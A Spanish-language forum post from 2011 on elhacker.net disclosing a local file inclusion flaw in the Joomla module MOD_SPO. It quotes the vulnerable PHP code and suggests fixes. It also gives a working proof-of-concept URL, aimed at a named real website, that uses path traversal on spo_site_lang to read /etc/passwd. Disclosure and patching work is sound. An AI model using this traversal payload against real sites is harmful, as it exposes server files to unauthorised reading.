elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 17:24  


Tema destacado: Nueva página de elhacker.net en Google+ Google+

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Simple Page Option LFI Module Joomla ¿0day?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Simple Page Option LFI Module Joomla ¿0day?  (Leído 1,566 veces)
coldalfred

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Simple Page Option LFI Module Joomla ¿0day?
« en: 15 Julio 2011, 22:34 »

Este complemento del Joomla MOD_SPO tiene LFI local file inclusion se pueden llamar archivos del servidor...


Vulnerable Code:

$s_lang =& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lang.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'english.php');


hace include de lo que llames con ciertos parámetros... la ultima version que es la 1.5.16 y todas las 1.5.x tambien lo son.


se puede resolver facilmente agregandole un str_replace o con permisos de lectura desde el htaccess (este lo recomiendo)

un ejemplo real:

http://www.europeancartransport.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email
  • =sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd%00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&spo_url2se


el nullbyte es junto pero blogger no me deja ponerlo el error es en la variable:

spo_site_lang=

__________


Alfredo Arauz (Security Expert - IT Ecuador) encontró la vulnerabilidad en una página web yo encontré el code vulnerable y generé el POC.

Fuente: http://seguridadblanca.blogspot.com/2011/07/simple-page-option-lfi.html

Saludos
Dr.White
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Option value script....
Desarrollo Web
Murder 2 489 Último mensaje 20 Abril 2004, 20:55
por Murder
Problemas con la Option
Programación Visual Basic
kakinets 3 701 Último mensaje 28 Julio 2005, 09:12
por APOKALYPSE
Ayuda con desarrollo web, master page, content page y SQL
Desarrollo Web
hArKhAnGeL 2 525 Último mensaje 12 Abril 2007, 21:04
por hArKhAnGeL
OPtion Button para BD
Programación Visual Basic
juanjoxx 5 967 Último mensaje 14 Julio 2007, 18:21
por Sancho.Mazorka
Option Button y BD
Programación Visual Basic
Urbe Tecnologica 2 1,735 Último mensaje 14 Febrero 2010, 18:16
por Urbe Tecnologica
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines